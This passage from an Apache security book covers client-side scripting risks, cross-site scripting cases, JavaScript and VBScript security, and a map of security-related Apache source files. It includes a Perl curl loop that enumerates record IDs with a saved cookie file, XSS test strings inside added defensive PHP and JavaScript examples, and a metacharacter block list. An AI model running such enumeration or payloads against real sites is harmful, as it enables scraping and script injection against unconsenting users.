“UNIX Security: Security in Programming,” Matt Bishop, SANS ’96. http://www.cs.ucdavis.edu/~bishop/scriv/1996-sans-tut.ps.


“Writing Safe Privileged Programs,” Matt Bishop, Network Security 1997. http://www.cs.ucdavis.edu/~bishop/scriv/1997-ns97.ps.
Summary


Your main aim is to anticipate every possible contingency that can result from your program’s use. That is, approach your code as a cracker would. Visit cracker sites and study how similar programs have been broken in the past. Apply these principles to your own program and see what happens. This is really the only way to be sure.


13


Hacking Secure Code: Apache at Client Side


IN THIS CHAPTER

• What Is Client-Side Programming?
• General Client-Side Security Issues
• JavaScript
• VBScript


One would think that client-side programming wouldn’t bear much on server security. Unfortunately, that isn’t true. Not only can client-side programming affect your server, it can also affect servers over which you have no control and of which you have no knowledge. This is so, even though client-side code has nothing to do with Apache, and Apache provides no mechanism to shore up client-side code. This chapter briefly covers the issue.


What Is Client-Side Programming? 


Client-side programming is programming in which you 
develop code to execute on the client side, most often (but 
not always) in a user’s Web client. 


Client-side languages or technologies you’ll likely use are
• JavaScript
• JScript
• VBScript


We'll soon look at these and other languages, but first let’s 
look at why client-side programming is perilous. 
Contributory Factors in Client-Side Insecurity


Factors that most contribute to client-side insecurity include the following:
• Exposed source code
• User primacy
• Limited security features of client-side languages


Exposed Source Code 

The chief reason for client-side code risks is fundamental: Users can easily examine 
your client-side code by viewing your HTML source. In addition to exposing your 
general logic, your Web page’s source also often exposes 


• Variable and function names
• Paths and hostnames
• Other languages, file types, and data types


Variable and Function Names Variable names needn’t necessarily communicate 
sensitive data about your system or network, but in many cases, they do. This is an 
area where clean programming practices clash with security aims. 


Nearly all developers who have formal computer science educations (and many who 
don’t) adhere to traditional naming conventions, conventions that call for not 
merely readability but also objective relationships between variable and function 
names and their respective purposes. 


A variable or function’s name should, in theory, reflect what that variable or function does. Some examples:


• callSQLbox
• dbQuery
• filterInput
• GetUserPassword
• QueryDB
• registerUID
• SendString
• userInput
Various forces bear on developers to name variables and functions in this manner.
Administrative types, for example, demand this so that they can quickly fire one 
programmer and hire another, or skip through technical portions of due diligence 
procedures. They want code that nearly anyone can understand so that they’re not 
dependent on any one individual. 


Similarly, many programmers do this to clearly communicate to other developers 
their application’s design. As several members of our judiciary have recently 
observed, source code is one form of free speech, and the language in which 
programmers impart ideas to their peers. 


Such naming conventions are fine when creating back end utilities, compiled 
programs, or when distributing open source applications. However, when you write 
client-side code, reconsider naming your variables and functions in this way. 


Certainly, experienced programmers will skillfully read your code anyway, no matter 
how arcane your variable and function names get. However, at least crackers won’t 
snag your site from garden-variety Web searches. Search engines like Google traverse 
page sources—and not merely page titles, META tags, and descriptions. 


Paths on Your Network Paths are another issue, and one not limited to client-side 
scripts. HTML and XML both naturally carry path information. However, scripts 
often point to sensitive resources, whereas HTML and XML rarely do so. 


To appreciate the difference, consider this HTML reference: 


<a href="http://images.3rdhost.net/images/smile.gif">


This doesn’t tell an attacker much; it merely indicates that you’re pulling images 
from another box. Many firms do this, especially if they have extensive content to 
which many developers contribute, often from disparate locations. Or, perhaps 
administrators seek to offload images (or processing) to beefy servers, thus allowing 
Web hosts to do nothing save receive and process requests. 


But consider this code: 


url = "http://dbserver.myhost.net/lookup?id=40023";


Here, we have a different situation: A database server houses a script that triggers 
output depending on a record or user number—and this is patently obvious to 
anyone. From this, enterprising attackers can make educated choices about what 
steps to take next. At a minimum, this invites attackers to write a robot that rakes 
through the record list and performs some uniform operation on them. 
For example:


#!/bin/perl
# Establish the base URL to get
$baseurl = "http://modules.apache.org/search?id=";

# set a counter for the index number
$basenumber = 1;

while ($basenumber < 343) {
    system("curl -b \"/shacker/.netscape/cookies\" $baseurl$basenumber -o $basenumber.html");
    $basenumber++;
}


Whenever possible, if your system is built this way, write server-side code instead. 


WARNING 


Note that even anchoring such code at the server might not do the trick. Given the proper 
circumstances, attackers can expose server-side JavaScript. Microsoft InterDev and 
Development Studio in many cases, for example, will suck down server-side code—even 
though the browser initially reports a failure. When attackers clear the prohibitive dialog box, 
Development Studio opens and displays the code in a debugging environment. This is true for 
style sheets, JavaScript, Jscript, and even VBScript. 





One method of protecting your code is to store it server-side, such as storing 
JavaScript functions inside *.js files. This is good, providing you take adequate 
precautions. For example, consider storing all such files together in a designated 
directory, and writing rules that disallow client requests for them (or protecting that 
directory using stringent permissions). If you don’t, users will simply point at files in 
that directory (with a browser that doesn’t handle *.js files) and download them to 
their local system. 


Other Languages, File Types, And Data Types Finally, some scripts reference other 
languages, file types, or data types. These could be 


• Values used in authentication
• Include or require files
• Java classes
• Media files
• Other client-side scripts
• Server-side scripts


In some cases, you cannot avoid including or referencing such values in client-side 
source. However, never embed any variable, function, file type, or data type that your 
system uses in authentication inline. It’s too dangerous, because it gives casual users 
a look inside your authentication mechanisms. 


User Primacy 

Another point to remember is this: After data arrives at the client side, users control 
it. They can change variable values, alter the structure of functions, change host- 
names and paths, and so on. And, if they do it right, they can use this altered code 
to test your server six ways to Sunday. 


Limited Security Features of Client-Side Languages 

Finally, know that client-side languages aren’t designed expressly with security in 
mind. In fact, some such languages (VBScript being one good example) strongly 
favor functionality. VBScript is capable of doing things no client-side scripting 
language ought to, and is superb at gluing together Microsoft-centric environments.


General Client-Side Security Issues 


Client-side programming can bring trouble in three ways:
• Danger to your server
• Danger to the client user’s machine
• Danger to a third-party server


Each problem poses different risks. As to your server, though you'll likely never sue 
yourself or your firm, you’d doubtless rather avoid security intrusions. And I 
presume that you’ve taken all the appropriate backup and disaster recovery 
measures, and that even if you experience an intrusion, you can revive your Web 
hosts in less than an hour. 


Client users are edgy folks, though, and don’t always institute adequate precautions. 
Many are sitting ducks. If you inadvertently damage their systems, they’ll shun your 
site or spread rumors about your security and you'll lose money, traffic, or both. Or 
in the worst case, such users might even sue you. 


Finally, firms that maintain third-party Web servers are even more likely to sue—if 
you're the problem source. Of course, in the end analysis, they (and not you) are 
responsible for security breaches they suffer, and that would eventually bear out in 
court. But you never want to see a courtroom or have bitter exchanges with other
Webmasters. To guard against such situations, strive to write tight client-side code. 


Danger to Third-Party Servers 


How in heaven’s blue sky could your site endanger another? It seems absurd, but it 
isn’t. This happens through a process known as cross-site scripting. 


Cross-site scripting is where, because of a weakness in your code, an attacker can use 
his machine to force your machine to attack a third Web host. 


A recent example is DCP-Portal. DCP-Portal, a site administration tool available at 
http: //www.dcp-portal.com/, is an advanced, PHP-based content management 
system for Linux systems. 


In mid-February 2002, Ahmet Sabri Alper from ALPER Research Labs reported a 
serious flaw. He wrote: 


DCP-Portal is a content management system with advanced features like Web-based update, link, file, member management, poll, calendar, and so on. Its main features include an admin panel to manage the entire site, a smart HTML editor to add news, content, and announcements, the capability for members to submit news/content and write reviews, and much more. It’s an open-source project, which is also supported by FreshMeat...A Cross Site Scripting vulnerability exists in DCP-Portal. This would enable a remote attacker to send information to victims from untrusted Web servers, and make it look as if the information came from the legitimate server.


The weakness was in a DCP-Portal PHP user script that enabled attackers to alter 
submitted JavaScript via PHP. This arcane example shows how not one but two 
languages contributed to a serious hole. Attackers could send JavaScript functions 
and commands that could, under the correct circumstances, attack a third machine. 
Table 13.1 describes some recent cross-site scripting issues. 


TABLE 13.1 Various Cross-Site Scripting Issues


Product                    Issue


Actinic Catalog            Actinic Catalog is a Web-enabled e-commerce application. In February 2002, frog-m@n demonstrated that Actinic Catalog harbored a hole that enabled attackers to nest illegal and malicious code that, when executed, would perform various nefarious acts on the client’s machine. Learn more at http://www.actinic.com/home.html.

DeleGate                   DeleGate is an open source proxy server for Windows and Unix available at http://www.delegate.org/delegate/. In February 2002, Global InterSec LLC revealed cross-site scripting vulnerabilities in DeleGate’s http(s) proxy code. Learn more at http://online.securityfocus.com/advisories/3857.

HNS                        HNS (Hyper NIKKI System) is a Web-based diary application available at http://www.h14m.org/. In late February 2002, the Hyper NIKKI System team announced a cross-site scripting hole. The scripts log.cgi and title.cgi enabled attackers to embed malicious code that would later attack legitimate users viewing it. Learn more at http://www.h14m.org/.

MakeBid                    The MakeBid system (specifically, MakeBid Auction Deluxe) is a Web-enabled, Perl-based package that facilitates online auctions. In late February 2002, Blake Frantz demonstrated that MakeBid enabled an attacker to place an item on auction with potentially malicious code in the description fields. Unsuspecting users later executed this code simply by viewing the auction item. Learn more at http://online.securityfocus.com/archive/1/255251.

Powie PForum               Powie PForum is a popular, PHP-based, MySQL-back-ended forum software that many Webmasters use to provide discussion forum capabilities to their user base. In late February 2002, Jens Liebchen demonstrated that Powie PForum does not adequately filter HTML tags, thus enabling attackers to pass malicious scripts inline to legitimate users on the same board (and perhaps steal cookie or other authentication data). Learn more at http://archives.neohapsis.com/archives/bugtraq/current/0260.html.

Prospero Message Boards    Prospero Message Boards is a package that provides Web users with forum capabilities. In late February 2002, the Computer Emergency Response Team reported a cross-site scripting hole in Prospero wherein attackers could send malicious JavaScript to the server. Legitimate users would later download these and their browser would execute them. For more information, see CERT Advisory CA-2000-02, “Malicious HTML Tags Embedded in Client Web Requests,” available at http://www.cert.org/advisories/CA-2000-02.html.

SlashCode                  SlashCode is a powerful, Web-enabled discussion software package. In February 2002, Hiromitsu Takagi demonstrated that SlashCode harbored a cross-site scripting hole that enabled attackers to nest illegal and malicious code that, when executed, would steal unsuspecting and legitimate users’ cookie information (and thus, circumvent the authentication scheme). Learn more at http://online.securityfocus.com/archive/1/256924.
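The filtering step that the PForum and MakeBid entries above lacked, as an added example (not the book’s code and not from either project). User-submitted text such as an auction description is stored as submitted and encoded for its HTML context at output time, so a script element in it is displayed as text rather than executed by the next visitor; the item fields and the rendering layout are assumptions.

```php
<?php
// Added example (not from the book): context-aware output encoding for
// user-submitted content rendered into an HTML page.

// Encode untrusted text for placement inside an HTML element body.
function htmlText(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Encode untrusted text for placement inside a double-quoted attribute value.
// Same encoding, kept separate so templates say which context they are in.
function htmlAttr(string $untrusted): string
{
    return htmlText($untrusted);
}

// An href deserves more than encoding: only http(s) URLs are allowed, since
// other schemes (javascript:, data:) would run in the viewer's browser even
// when every character is correctly encoded.
function safeHref(string $untrusted): ?string
{
    $u = trim($untrusted);
    if (!preg_match('#^https?://#i', $u) || filter_var($u, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    return htmlAttr($u);
}

// Render one auction item the way a listing page would. Every field that came
// from a user passes through the encoder for its context; a rejected link
// degrades to plain text instead of being dropped silently.
function renderItem(array $item): string
{
    $link  = safeHref($item['url'] ?? '');
    $title = htmlText($item['title'] ?? '');
    if ($link !== null) {
        $title = '<a href="' . $link . '">' . $title . '</a>';
    }
    return "<li>$title<p>" . htmlText($item['description'] ?? '') . "</p></li>\n";
}

// Constructed items: one benign, one of the kind the table describes, with a
// script in the description and a javascript: URL in the link field.
$items = [
    ['title' => 'Vintage radio', 'url' => 'https://shop.example/item/1',
     'description' => 'Works fine & looks great'],
    ['title' => 'Rare <b>coin</b>', 'url' => 'javascript:alert(1)',
     'description' => 'Mint condition <script>alert("xss")</script>'],
];
echo "<ul>\n";
foreach ($items as $item) {
    echo renderItem($item);
}
echo "</ul>\n";
```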
JavaScript


JavaScript is a powerful scripting language from Netscape, and works in and manipulates Communicator’s environment. To deal with cross-site attacks, Netscape took a slightly different approach, called the Same Origin Policy. The Same Origin Policy is essentially this: The JavaScript engine examines the initial or the original URL purported by a script. If that script tries to access another site in-program, JavaScript won’t allow it. This is an excellent idea—and something that you can also integrate into your server-side scripts.


Moreover, JavaScript prevents access to sensitive files (such as preferences.js) through a permissions scheme. This scheme prohibits certain objects and methods from invoking methods that can cull sensitive information from a user’s hard disk drive. Table 13.2 lists JavaScript objects and methods that require special privileges.





TABLE 13.2 JavaScript Objects and Methods That Require Permissions

Method                  Discussion

about                   about URLs (for example, about:cache or about:global) are restricted. To perform an about:blank, the calling party needs UniversalBrowserRead.

close                   The close method, which allows you to close the instant browser window, requires UniversalBrowserWrite.

DragDrop                DragDrop requires UniversalBrowserRead.

enableExternalCapture   The enableExternalCapture method allows you to capture page events loaded from disparate servers. This requires UniversalBrowserWrite.

event                   To set properties on an event, the function or code must have UniversalBrowserWrite.

history                 The history object, one of the most commonly used, requires UniversalBrowserRead.

moveBy                  The moveBy method, which allows you to move a window, requires UniversalBrowserWrite.

moveTo                  The moveTo method, which allows you to move a window, requires UniversalBrowserWrite.

navigator               The navigator object needs special privileges to read (UniversalBrowserRead) and write (UniversalBrowserWrite) user preferences (preferences.js).

open                    The open method, which allows you to open new windows, requires UniversalBrowserWrite.

resizeBy                The resizeBy method, which allows you to resize a window, requires UniversalBrowserWrite.

resizeTo                The resizeTo method, which allows you to resize a window, requires UniversalBrowserWrite.

window                  The window object supports several methods that require permissions, including close, enableExternalCapture, moveBy, moveTo, open, resizeBy, and resizeTo.





This doesn’t mean, however, that JavaScript doesn’t pose risks. It has a significant 
security history all the way back to its inception. But when we discuss security holes 
in client-side scripting languages, we have a two-sided situation. Vendors can alter 
their client-side languages and interpreter engines to be more secure, but this doesn’t 
necessarily cure this or that problem forever. 

Users are strange creatures. Some users, once comfortable with this or that application 
(or even this or that version of an application), are reluctant to change or 
upgrade. This means that even though Netscape observed good security practices and 
updated both its languages and interpreters, users are floating around out there with 
old Netscape versions. For these folks, old holes are still “real” and remain so until 
such users upgrade. 


Today, JavaScript most commonly surfaces in situations where attackers can embed it 
in submission forms (or when aiming at server scripts) and there pass malicious code 
to third parties. Some recent victims include the following: 

• COWS CGI Online Worldweb Shopping—http://www.cows.co.uk/ 
• DCP-Portal—http://www.dcp-portal.com/ 
• Plumtree Corporate Portal—http://www.plumtree.com/products/portal/ 
• Proxomitron—http://spywaresucks.org/prox/ 
• YaBB—http://www.yabb.org/ 

JavaScript itself doesn’t have—at this moment—any holes within it (nor does 
VBScript, as I’ll explain later). Rather, nearly all holes arise from programming errors. 
The usual suspects: 

• Developers fail to adequately filter input 
• Developers fail to institute same-origin checks 
• Developers expose sensitive information in their code 

So long as you observe these issues as listed at chapter’s end, your code shouldn’t 
result in problems. 


VBScript 

VBScript is a scripting language that operates in and manipulates Microsoft Internet 
Explorer’s environment. VBScript, now integrated into a blanket technology called 
Windows Script, as described by Microsoft, brings 

...active scripting to a wide variety of environments, including Web client scripting in 
Microsoft Internet Explorer and Web server scripting in Microsoft Internet Information Service. 
VBScript talks to host applications using Windows Script. With Windows Script, browsers and 
other host applications do not require special integration code for each scripting component. 
Windows Script enables a host to compile scripts, obtain and call entry points, and manage 
the namespace available to the developer. With Windows Script, language vendors can create 
standard language runtimes for scripting. Microsoft will provide runtime support for VBScript. 
Microsoft is working with various Internet groups to define the Windows Script standard so 
that scripting engines can be interchangeable. Windows Script is used in Microsoft Internet 
Explorer and in Microsoft Internet Information Service. (Visual Basic Scripting Edition, VBScript 
Documentation, MSDN Online, http://msdn.microsoft.com/library) 

Much like competing languages, VBScript resides most frequently in HTML. Think of 
it as having all the functionality of JavaScript with Visual Basic-style syntax. 


A hello world example (the script is bound to the button’s onClick event, so the 
message box appears only when Button1 is clicked): 

<HTML> 
<HEAD> 
<TITLE>Test Button</TITLE> 
</HEAD> 
<BODY> 
<FORM NAME="Form1"> 
<INPUT TYPE="Button" NAME="Button1" VALUE="Click"> 
<SCRIPT FOR="Button1" EVENT="onClick" LANGUAGE="VBScript"> 
    MsgBox "Hello World!" 
</SCRIPT> 
</FORM> 
</BODY> 
</HTML> 


However, VBScript can also reach other applications, and on nearly all Windows 
platforms (95, 98, NT, 2000, XP). Often, VBScript’s extended functionality can 
backfire, as it did in late February 2002 when Zentai Peter Aron illustrated that 
VBScript could, in MSIE, access from one frame the contents of another, even when 
those frames originated or resided on different systems. 

Thus, as Microsoft conceded, 

A malicious user could exploit this vulnerability by using scripting to extract the contents of 
frames in other domains, then sending that content back to their Web site. This would enable 
the attacker to view files on the user’s local machine or capture the contents of third-party 
Web sites the user visited after leaving the attacker’s site. The latter scenario could, in the 
worst case, enable the attacker to learn personal information like user names, passwords, or 
credit card information. 

NOTE 

To learn more about this issue, see Microsoft Security Bulletin MS02-009, “Incorrect VBScript 
Handling in IE can Allow Web Pages to Read Local Files,” February 21, 2002, at 
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-009.asp. 





Shortly after Microsoft released VBScript, its engineers recognized that the language’s 
functionality exceeded what average Webmasters needed, and hence reduced its 
feature set. VBScript does not support the following features: 

• DDE (Dynamic Data Exchange) 
• Direct Database Access (DAO) 
• DLL execution 
• File I/O 
• Object instantiation 

As of release 2.0, VBScript’s security is much improved. 


Summary 

When developing client-side code, take these precautions: 

• Confine functions that pull data from database servers to server-side code only. 
• Carefully consider how you name variables, functions, data structures, and 
  other key script components. 
• Always provide an additional layer of data validation at the client level when 
  possible (block metacharacters and other illegal input). 
• Provide at least baseline server-side filtering that checks for additional SQL 
  statements, cookies, persistent (state) data, posted data, query strings, and 
  URLs. 
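As an added example (not code from the book), the following JavaScript shows the client-side layer the summary and the "usual suspects" list describe: rejecting metacharacters in form fields, escaping values before they are written back into the page, and checking the origin of data arriving from another frame against an allowlist. The allowlist, the message event shape, and the sample form are assumptions constructed for this example.

```javascript
// Added example, not from the book: a client-side validation layer that
// follows the chapter's summary. It complements the server-side filtering
// the summary also requires; the server must never rely on these checks alone.

// Characters the summary calls metacharacters: anything that changes meaning
// once the value reaches HTML, a shell, or an SQL statement.
const METACHARS = /[<>"'`;&|$()\\%]/;

// Accept a form field only if it is a non-empty string, within maxLen, and
// free of metacharacters. Returns true when the value may be submitted.
function validateField(value, maxLen = 64) {
  if (typeof value !== "string") return false;
  if (value.length === 0 || value.length > maxLen) return false;
  return !METACHARS.test(value);
}

// Screen a whole submission; returns the names of the fields that failed, so
// the caller can block the submit and tell the user which fields to fix.
function rejectedFields(form) {
  return Object.keys(form).filter((name) => !validateField(form[name]));
}

// Escape a value before it is written into the page (innerHTML,
// document.write), so injected markup is displayed as text, not executed.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Same-origin check for data arriving from another frame or window: compare
// the sender's origin with an explicit allowlist of "scheme://host[:port]"
// strings (the allowlist is an assumption of this example) instead of
// trusting any frame that can reach us.
function isTrustedOrigin(origin, allowed) {
  return allowed.includes(origin);
}

// Handle a window "message" event (event shape assumed: { origin, data }).
// Returns the escaped payload, or null when the sender is not trusted.
function handleMessage(event, allowed) {
  if (!isTrustedOrigin(event.origin, allowed)) return null;
  return escapeHtml(event.data);
}

// Constructed sample submission: the comment field carries injected markup.
const SAMPLE_FORM = {
  user: "alice_01",
  comment: "<script>alert(1)</script>",
};

// rejectedFields(SAMPLE_FORM) returns ["comment"]
```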


PART V 
Advanced Apache 


IN THIS PART 


14 Apache Under the Hood: Open Source and Security 
15 Apache/SSL 

16 Apache and Firewalls 

17 Apache and Ciphers 


18 Hacking Homegrown Apache Modules 
Apache Under the Hood: Open Source and Security 

In the Introduction, I opined that open source lends itself to 
more security. However, I also observed that although this 
is true, you must know where to look before you can 
examine Apache’s security facilities. This chapter paints an 
Apache security “road map.” 

The road map includes the following: 

• An Apache source tree with pointers 
• Files that relate to password authentication 
• Files that deal with general security issues 

IN THIS CHAPTER 

• Security Contexts in Apache’s Source Tree 
• Files That Deal with Passwords 
• Files That Deal with General Security 
• Key Apache C Source Files and What They Do 
• Include File Cross Reference 

Security Contexts in Apache’s Source Tree 

In Listing 14.1, you’ll find the Apache source tree, along 
with notations indicating the location of security-related 
information therein. 
LISTING 14.1 Security Contexts in Apache’s Source Tree 

httpd-2_0_28 - [who handles Apache security, changes, README] 
    build 
        win32 
    docs 
        cgi-examples 
        conf - [Example configuration files] 
        docroot 
        error 
            include 
        icons 
            small 
        man 
        manual - [HTML docs, logging, installation] 
            developer - [Docs, Request Processing model] 
            faq 
            howto - [Docs, auth, CGI] 
            images 
            misc - [Docs, custom error msgs, security tips] 
            mod - [explanation of modules] 
            platform - [Run Apache as Windows service] 
            programs - [Explanation of htpasswd] 
            search 
            ssl - [howto, glossary, config tips] 
            vhosts 
    include - [httpd.h, http_request.h] 
    modules 
        aaa - [mod_access.c, network access control] 
        arch 
            netware 
            win32 
        cache 
        dav 
            fs 
            main 
        echo 
        experimental 
        filters - [mod_include.c, Win32 canonical file/directory] 
        generators 
        http 
        loggers 
        mappers - [mod_negotiation.c, mod_rewrite.c] 
        metadata 
        proxy 
        ssl - [The SSL engine] 
        test 
    os 
        beos 
        bs2000 
        netware 
        os2 
        tpf 
            samples 
        unix - [unixd.c, -DBIG_SECURITY_HOLE] 
        win32 
    server - [main.c, protocol.c, request.c, vhost.c] 
        mpm 
            beos 
            mpmt_os2 
            netware 
            perchild 
            prefork 
            spmt_os2 
            threaded 
            winnt - [security descriptors, ACLs, permissions] 
            worker 
    srclib 
        apr 
            build 
            docs - [Docs, canonical filenames] 
            dso 
                aix 
                beos 
                os2 
                os390 
                unix 
                win32 
            file_io 
                netware 
                os2 
                unix 
                win32 - [security descriptors, SID, pipes] 
            i18n 
                unix 
            images 
            include - [md5, apr_md5.h] 
                arch 
                    aix 
                    beos 
                    netware 
                    os2 
                    os390 
                    unix 
                    win32 
            locks 
                beos 
                netware 
                os2 
                unix 
                win32 - [security descriptors, SID, perms] 
            memory 
                unix 
            misc 
                netware 
                os2 
                unix 
                win32 
            mmap 
                unix 
                win32 
            network_io 
                beos 
                os2 
                unix 
                win32 
            passwd - [MD5, apr_md5.c] 
            shmem 
                beos 
                os2 
                unix 
            strings 
            tables 
            test 
            threadproc 
                beos 
                netware 
                os2 
                unix 
                win32 - [proc.c: Proc/thread security attributes] 
            time 
                unix 
                win32 
            user 
                netware 
                unix 
                win32 
        apr-util 
            buckets 
            build 
            crypto - [apr_md4.c, MD4] 
            dbm 
                sdbm 
            encoding 
            hooks 
            include - [apr_md4.c, MD4] 
                private 
            ldap 
            misc 
            test - [testmd4, MD4] 
            uri - [apr_uri.c, password suppression] 
            xml 
                expat 
                    conftools 
                    lib 
        pcre 
            doc 
            testdata 
Files That Deal with Passwords 

The following functions and routines deal with password handling in Apache: 

• apr_compat.h—Defines ap_validate_password and apr_password_validate. 
• apr_errno.h—Beginning at line 220: sets up APR_EMISMATCH (two passwords 
  do not match). 
• apr_getpass.c—Abstraction to provide for obtaining a password. 
• apr_lib.h—Beginning with comments at line 239, validates any password 
  encrypted with any algorithm that APR understands. 
• apr_md5.c—Beginning with comments at line 496, sets up MD5 passwords. 
• apr_md5.h—Beginning with comments on line 173, sets up routines to encode 
  passwords in MD5 and, culminating on line 179, apr_md5_encode(). 
• apr_sha1.c—Provides a means to SHA1 crypt/encode a plaintext password. 
• apr_sha1.h—Beginning with line 80, handles the SHA password, sets the 
  length, provides a means to crypt/encode the string, makes it compatible with 
  Netscape, and so on. 
• apr_uri.c—Optionally suppresses passwords for security reasons. 
• apr_uri.h—Beginning at line 107, defines APR_URI_UNP_OMITPASSWORD, 
  APR_URI_UNP_OMITUSERINFO, and APR_URI_UNP_REVEALPASSWORD; and beginning at 
  line 165, suppression of the password for security reasons. 
• errorcodes.c—Returns “passwords do not match.” 
• http_protocol.c—Describes credentialing by password. 
• http_protocol.h—Gets the password from the request headers. 
• main.c—apr_password_validate(). 
• mod_auth.c—Beginning at line 114, tries to open the password file and, if 
  possible, checks the password; if not, it reports a failure. Culminates with a 
  Password Mismatch on line 234 if the password is bogus. 
• mod_auth_anon.c—Beginning at line 111, establishes and claims memory for the 
  anonymous password (if required, or otherwise reports a failure), checks whether 
  the password is filled out, and finally checks to see whether it looks like an 
  e-mail address (culminating on line 256). 
• mod_auth_db.c—Beginning on line 150, establishes the DB file’s location, and 
  culminating with line 332, returns a Password Mismatch if the password is 
  bogus. 
• mod_auth_dbm.c—Beginning on line 143, establishes the DBM database file to 
  look at and culminates on line 268, reporting a Password Mismatch if the 
  password is bogus. 
• mod_auth_digest.c—Beginning with comments on line 650, sets the 
  username/password hash filename, tries to open the password file and, if 
  possible, checks the password; if not, reports a failure. Otherwise, it 
  culminates at line 1723 with a Password Mismatch if the password is bogus. 
• mod_example.c—Beginning on line 1087, shows a match procedure between 
  the sent password and the database (encoded) password. 
• mod_log_config.c—Returns the URI-nested password. 
• mod_proxy.c—See APR_URI_UNP_REVEALPASSWORD. 
• mod_proxy.h—Sets up **passwordp. 
• mod_status.c—Comments advise you to password-protect your status pages 
  (line 68). 
• proxy_ftp.c—Checks the password (see lines 126, 144, 149, 199, 200, 846, 849, 
  856). 
• proxy_util.c—On lines 206-610, sets up and checks the password. 
• scoreboard.c—Prevents passwords from being visible in the server status view. 
• service.c—Reports a NULL password. 
• ssl_engine_kernel.c—Sets up a dummy password (lines 886-926). 
• ssl_engine_log.c—Reports bad passwords (line 145). 
• ssl_engine_pphrase.c—Announces a possible error in getting the password (line 
  510). 
• util_ldap.h—Checks a username/password combination by binding to the 
  LDAP server. 
• util_script.c—Discusses attackers capturing passwords (CGI). 


Files That Deal with General Security 

The following files handle various security tasks: 

• apr_file_info.h—Defines APR_FILEPATH_SECUREROOTTEST and 
  APR_FILEPATH_SECUREROOT. 
• apr_sha1.c—NIST Secure Hash Algorithm. 
• apr_sha1.h—NIST Secure Hash Algorithm. 
• core.c—Sets APR_FILEPATH_SECUREROOT. 
• getuuid.c—Gets the IEEE node ID. 
• log.c—Logging. 
• mod_auth.c—Sets auth_authoritative to TRUE. 
• mod_auth_db.c—Sets auth_dbauthoritative to TRUE. 
• mod_auth_dbm.c—Sets auth_dbmauthoritative to TRUE. 
• mod_isapi.c—Sets SERVER_PORT_SECURE. 
• mod_usertrack.c—Uses cryptographically secure cookies. 
• proxy_connect.c—Handles Netscape CONNECT method secure proxy requests. 


Key Apache C Source Files and What They Do 

Table 14.1 describes key Apache C source files and what they do. 

TABLE 14.1 Key Apache C Source Files 

File                    Purpose 

beos.c                  The new BeOS MPM 
cache_storage.c         Cache module 
cache_util.c            Cache support module 
config.c                Contains general command loop and bookkeeping 
dbm.c                   DAV extension for DBM-style databases 
fdqueue.c               Detects when the fd_queue_t is full 
http_core.c             The Big Kahuna—the heart of the server 
http_protocol.c         Routines that directly communicate with clients 
http_request.c          Functions to get and process requests 
libprews.c              NLM 
lock.c                  DAV file system lock implementation 
log.c                   Dealing with the logs and errors 
mod_access.c            Security options 
mod_actions.c           Executes scripts based on MIME type or HTTP method 
mod_alias.c             Stuff for dealing with directory aliases 
mod_auth.c              HTTP authentication 
mod_auth_anon.c         Anonymous authentication 
mod_auth_db.c           db-based authentication 
mod_auth_dbm.c          dbm-based authentication 
mod_auth_digest.c       MD5 digest authentication 
mod_autoindex.c         Handles the on-the-fly HTML index generation 
mod_cache.c             Cache module 
mod_case_filter.c       “Ben messing around” 
mod_case_filter_in.c    A sample input filter (he’s serious now) 
mod_cern_meta.c         Controls Meta File behavior on a per-directory basis 
mod_cgi.c               Keeps all script-related ramblings together, compliant to CGI/1.1 
mod_cgid.c              Keeps all script-related ramblings together with new vars 
mod_charset_lite.c      Simple hokey charset recoding configuration module 
mod_dav.c               DAV extension module for Apache 2.0 
mod_dav_fs.c            DAV extension 
mod_dir.c               Handles default index files, and trailing -/ redirects 
mod_disk_cache.c        Disk cache module 
mod_env.c               Environment 
mod_example.c           Apache sample module 
mod_expires.c           Controls the form of the Expires: header 
mod_ext_filter.c        Allows Unix-style filters to filter http content 
mod_file_cache.c        Better caching for W32 
mod_headers.c           Add/append/remove HTTP response headers 
mod_include.c           Handles the server-parsed HTML documents 
mod_info.c              Info Module, displays configuration information 
mod_isapi.c             Implements Microsoft’s ISAPI 
mod_log_config.c        Implements the TransferLog directive 
mod_mem_cache.c         Cache uses apr_hash functions 
mod_mime.c              Sends/gets MIME headers for requests 
mod_mime_magic.c        MIME type lookup via file magic numbers 
mod_negotiation.c       Tracks MIME types the client will accept 
mod_proxy.c             Proxy module 
mod_rewrite.c           Uses a rule-based rewriting engine 
mod_setenvif.c          Sets environment variables based on matching request headers 
mod_so.c                Loads Apache modules at runtime 
mod_speling.c           Spelling module 
mod_ssl.c               Apache Interface to OpenSSL 
mod_status.c            Displays Apache internal performance data 
mod_suexec.c            Provides safe execution of CGI 
mod_unique_id.c         Generates a unique identifier for each request 
mod_userdir.c           Implements the UserDir command 
mod_usertrack.c         User Tracking Module (was mod_cookies.c) 
mod_vhost_alias.c       Support for dynamically configured mass virtual hosting 
mod_win32.c             Core Win32 
mpm_netware.c           NetWare MPM 
mpm_winnt.c             Winnt MPM 
mpmt_os2.c              Multiprocess, multithreaded MPM for OS/2 
props.c                 DAV Property database handling 
proxy_connect.c         CONNECT method for Apache proxy 
proxy_ftp.c             FTP proxy module 
proxy_http.c            HTTP routines for Apache proxy 
proxy_util.c            Utility routines for Apache proxy 
registry.c              Functions to handle the Win32 registry 
service.c               Run as a service in Winnt 
ssl_engine_ds.c         Additional SSL data structures 
ssl_engine_config.c     Apache Interface to OpenSSL 
ssl_engine_dh.c         Diffie-Hellman built-in temporary parameters 
ssl_engine_ext.c        SSL extensions to other Apache parts 
ssl_engine_init.c       Initialization of servers 
ssl_engine_io.c         I/O functions 
ssl_engine_kernel.c     The SSL engine kernel 
ssl_engine_log.c        The SSL logging facility 
ssl_engine_mutex.c      Semaphore for mutual exclusion 
ssl_engine_pphrase.c    Pass phrase dialog 
ssl_engine_rand.c       Random number generator seeding 
ssl_engine_vars.c       SSL engine variable lookup facility 
ssl_expr.c              SSL expression handling 
ssl_expr_eval.c         SSL expression evaluation 
ssl_scache.c            SSL session cache: common abstraction layer 
ssl_scache_dbm.c        SSL session cache via DBM 
ssl_scache_shmcb.c      SSL session cache via shared memory 
ssl_scache_shmht.c      Session cache via shared memory (hash table variant) 
ssl_util_ssl.c          Additional utility functions for OpenSSL 
